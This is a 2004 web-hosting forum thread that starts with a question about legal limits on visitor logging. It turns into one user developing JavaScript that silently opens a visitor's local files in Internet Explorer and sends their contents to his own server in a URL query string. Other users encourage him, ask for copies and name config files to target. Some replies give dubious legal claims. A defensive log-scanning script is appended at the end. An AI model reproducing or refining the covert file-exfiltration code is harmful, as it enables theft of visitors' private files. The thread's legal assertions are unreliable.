jmoschetti45 -
Joined: 29 Oct 2003 Posts: 95 Location: MI USA
Posted: Sat Mar 27, 2004 5:33 pm Post subject: Logging and legal issues
Well, this is going to sound stupid, but someone wants to sue me because I use AWStats and I have it set up to get their resolution and what their browser is capable of doing. I don't think they have any legal reason to. Is there actually a limit to what I can legally log?
_________________ http://jmoschetti45.com
 |
nquin321 -
Joined: 29 Jan 2004 Posts: 296 Location: Right Behind You
Posted: Sat Mar 27, 2004 5:48 pm
I don't think there is a limit to what you can log, but to be legally protected, create a privacy policy.
Like this one: http://www.google.com/privacy.html
 |
jmoschetti45 -
Joined: 29 Oct 2003 Posts: 95 Location: MI USA
Posted: Sat Mar 27, 2004 5:50 pm
I already have one. It clearly states that all that is logged. I figure even if he does bother to press charges I should have good odds of getting out of this mess without any harm.
_________________ http://jmoschetti45.com
 |
iNaNimAtE -
Joined: 05 Nov 2003 Posts: 2381 Location: Everywhere you're not.
Posted: Sat Mar 27, 2004 8:34 pm
There is nothing wrong with logging user information (to a point). You can log monitor resolution, et cetera, as long as you state it in the privacy policy.
What you can't (legally) log: PID, personal information (name, address, et cetera), files stored on the computer (unless the user explicitly agrees to it), and running processes. I'm sure there are other things I forgot, but that is the basic idea.
_________________ Bienvenidos!
 |
jmoschetti45 -
Joined: 29 Oct 2003 Posts: 95 Location: MI USA
Posted: Sun Mar 28, 2004 2:04 am
So it would be illegal to modify the misc_tracker.js AWStats script to return the contents of files even if it is in the privacy policy? Also, does that mean my auto IP lookup script violates privacy? It takes the incoming IP and does a Whois on it and records the results in a file.
_________________ http://jmoschetti45.com
 |
iNaNimAtE -
Joined: 05 Nov 2003 Posts: 2381 Location: Everywhere you're not.
Posted: Sun Mar 28, 2004 6:21 am
No, WHOIS information is public. It is only illegal if you collect it on purpose.
_________________ Bienvenidos!
 |
TRUSTAbyss -
Joined: 29 Oct 2003 Posts: 3752 Location: USA, GA
Posted: Sun Mar 28, 2004 1:07 pm
If you want to keep an eye on your log files without sneaky little users on your site getting in your business, use Weblog Expert Lite, it's free!
http://www.weblogexpert.com
 |
iNaNimAtE -
Joined: 05 Nov 2003 Posts: 2381 Location: Everywhere you're not.
Posted: Sun Mar 28, 2004 7:23 pm
I've got the full version of WebLog Expert, and it is worth all the money. If you want a little more complex logs, I definitely recommend that one.
_________________ Bienvenidos!
 |
jmoschetti45 -
Joined: 29 Oct 2003 Posts: 95 Location: MI USA
Posted: Mon Mar 29, 2004 3:45 am
OK, I will look into that as soon as I have some time. I was doing a little coding last night until about 5am and came across a way to get pretty much anything off someone's machine and back onto my server. I bet it's illegal though, right, even if it's in my privacy policy?
_________________ http://jmoschetti45.com
 |
Anonymoose -
Joined: 09 Sep 2003 Posts: 2192
Posted: Mon Mar 29, 2004 1:50 pm
jmoschetti45 wrote: "OK, I will look into that as soon as I have some time. I was doing a little coding last night until about 5am and came across a way to get pretty much anything off someone's machine and back onto my server. I bet it's illegal though, right, even if it's in my privacy policy?"
What exactly are you talking about in terms of getting "anything off someone's machine"? If you mean browser resolution or any other information that is leaked to you deliberately by their choice of browser, there is no problem logging whatever you want. If you mean trying to take a copy of their password file from their Windows directory / get a document from the My Documents folder without their consent, you're on very dodgy ground. Both US and UK law would view this as accessing a system without explicit permission and put you in the wrong.
As a secondary thought, is your method to use an existing exploit for a particular browser, or are you talking of a problem in a general scripting language that allows access from all browsers? If you've coded something and only tested it on IE, I'd be very surprised if it still leaks information to you in Mozilla/Opera/etc.
I'd be interested to see it in action if you need a non-suing guinea pig :wink:
 |
goose -
Joined: 17 Sep 2002 Posts: 608 Location: The Land Of OZ! come here toto!
Posted: Mon Mar 29, 2004 4:26 pm
maybe i should sue the government for not giving me a job!!
:lol:
like they give a shit! :twisted:
_________________ living in an armish paradise.....no gates here!
mawuahahaha :)
 |
jmoschetti45 -
Joined: 29 Oct 2003 Posts: 95 Location: MI USA
Posted: Mon Apr 05, 2004 3:05 am
What I was doing was using JavaScript to read a file. It can display the contents of text files in your browser for you. So I loaded the contents in a variable and requested a page on my server like this: missing_page.php?{$file_buffer_here}. The text from the file would then show up in the log as a 404 because the page did not exist. I have only tested this on IE 5.5 and 6. I will improve the script and possibly post a copy here if that's legal and anyone is interested. It will be a while though until it's working exactly like I want it to.
_________________ http://jmoschetti45.com
 |
msmollison -
Joined: 24 Feb 2004 Posts: 15
Posted: Mon Apr 05, 2004 5:06 am
Well, you can send it to me even if it is illegal :D Who's to say I am going to use it?
 |
TRUSTAbyss -
Joined: 29 Oct 2003 Posts: 3752 Location: USA, GA
Posted: Mon Apr 05, 2004 5:11 am
I wouldn't mind using it either, it could be a useful tool to catch crackers, oh I'm sorry, I guess I meant the word "hackers" :)
 |
jmoschetti45 -
Joined: 29 Oct 2003 Posts: 95 Location: MI USA
Posted: Mon Apr 05, 2004 7:46 pm
Now that people are interested I will step up development a little. I should have a semi-working beta version in a week or so.
_________________ http://jmoschetti45.com
 |
jmoschetti45 -
Joined: 29 Oct 2003 Posts: 95 Location: MI USA
Posted: Mon Apr 05, 2004 8:47 pm
I just finished a very pre-alpha version. Let me know if you want the full version. Below is a sample of the script:
Code:
filehandle=window.open('file://C:/test.txt');
filecontents=filehandle.document.body.innerText;
filehandle.close();
alert(filecontents);
It will show the user the contents of the file in a pop-up box.
It's been tested in IE 5.5 and 6.
_________________ http://jmoschetti45.com
 |
Anonymoose -
Joined: 09 Sep 2003 Posts: 2192
Posted: Wed Apr 07, 2004 12:21 am
That shows the local file to the user though, and executes in the local zone. Can you confirm that it will allow you to access a user's files remotely?
Trustpunk, how on earth do you think that would help you catch hackers?
 |
jmoschetti45 -
Joined: 29 Oct 2003 Posts: 95 Location: MI USA
Posted: Wed Apr 07, 2004 2:46 am
Yes, it executes it locally, but it's so fast you don't see the window. I'm still working on the 'phoning home' feature. Something similar to this:
Code:
url="http://www.xyz.com/crap.pl?" + filecontents;
Note: I just came up with that right now, the syntax might not be perfect.
Then just open a blank window and point it to 'url' and quickly close it.
It's not perfect yet, but once I get a good version done and we all put our heads together we'll come up with something good :wink:
_________________ http://jmoschetti45.com
 |
Anonymoose -
Joined: 09 Sep 2003 Posts: 2192
Posted: Wed Apr 07, 2004 8:45 am
Hmm, that's pretty sneaky :D You do have to know the path to the user's file though. Wouldn't stop you grabbing things like someone's Abyss configuration files or anything that you could have half a chance of guessing the right path for... 8O
 |
jmoschetti45 -
Joined: 29 Oct 2003 Posts: 95 Location: MI USA
Posted: Wed Apr 07, 2004 3:48 pm
One problem with stealing Abyss config files. The extension is .conf. IE will attempt to download the file instead of displaying it. That doesn't work. This only works with files that IE will display, not pop up a download box for. The fixed path is also a minor problem. I'm working on the phoning home feature right now.
_________________ http://jmoschetti45.com
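
Added example, not part of any post in this thread: the requests described above leave a recognisable trace, a 404 for a page that does not exist with free text after the "?", and this sketch flags such entries so an operator or proxy administrator can find and purge visitor data that ended up in a log. It assumes Combined Log Format; the length threshold and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Combined Log Format: host ident user [time] "METHOD target PROTO" status size ...
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

MIN_QUERY_LEN = 40  # assumed threshold; tune against your own traffic


def suspicious_requests(lines, min_len=MIN_QUERY_LEN):
    """Return (host, path, decoded_query) for 404s whose query string looks
    like free text rather than key=value parameters."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m.group("status") != "404":
            continue
        path, sep, query = m.group("target").partition("?")
        if not sep or len(query) < min_len:
            continue
        decoded = unquote_plus(query)
        # Ordinary parameters are key=value pairs joined by '&'; pasted file
        # content is mostly free text with whitespace and few '=' signs.
        pairs = [p for p in query.split("&") if "=" in p]
        whitespace = decoded.count(" ") + decoded.count("\n")
        if not pairs or whitespace >= 5:
            hits.append((m.group("host"), path, decoded))
    return hits


# Constructed sample log lines (not taken from the thread).
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Apr/2004:03:05:11 -0400] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    '192.0.2.10 - - [05/Apr/2004:03:05:12 -0400] "GET /search.php?q=abyss+web+server&page=2&lang=en&sort=date HTTP/1.1" 200 2048 "-" "Mozilla/4.0"',
    '192.0.2.44 - - [05/Apr/2004:03:06:40 -0400] "GET /missing_page.php?notes%20for%20monday%0D%0Acall%20the%20bank%20about%20the%20loan HTTP/1.1" 404 312 "-" "Mozilla/4.0"',
    '192.0.2.77 - - [05/Apr/2004:03:07:02 -0400] "GET /old.html?ref=home HTTP/1.1" 404 312 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for host, path, text in suspicious_requests(SAMPLE_LOG):
        print(f"{host} {path} carried {len(text)} chars of text: {text!r}")
```

Entries flagged this way are themselves personal data sitting in the log, so they belong in whatever retention and redaction rules the site's privacy policy states.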